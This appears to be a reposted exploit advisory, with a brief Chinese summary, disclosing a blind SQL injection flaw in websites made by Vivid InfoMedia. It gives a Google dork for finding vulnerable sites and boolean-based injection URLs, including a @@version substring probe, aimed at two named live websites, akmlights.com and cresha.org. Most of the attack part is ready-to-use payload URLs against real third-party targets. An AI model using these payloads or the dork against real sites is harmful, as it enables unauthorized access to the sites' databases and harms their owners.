文章披露了Vivid InfoMedia开发的网站存在盲SQL注入漏洞。通过在URL参数末尾添加特定条件(如'and true'或'and false'),攻击者可利用此漏洞进行SQL注入攻击。示例包括akmlights.com和cresha.org等网站。 2025-4-28 19:51:12 Author: cxsecurity.com(查看原文) 阅读量:26 收藏
********************************************************* #Exploit Title: Vivid InfoMedia - Blind Sql Injection Vulnerability #Date: 2025-04-27 #Exploit Author: Behrouz Mansoori #Google Dork: ""Developed & Maintained By Vivid InfoMedia" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://akmlights.com/lighting-product.php?id=12%27%20and%20true--+ * https://akmlights.com/lighting-product.php?id=12%27%20and%20false--+ * https://akmlights.com/lighting-product.php?id=12%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * https://cresha.org/Category-product.php?id=101%27%20and%20true--+ * https://cresha.org/Category-product.php?id=101%27%20and%20false--+ * https://cresha.org/Category-product.php?id=101%27%20and%20substring(@@version,1,1)=1--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh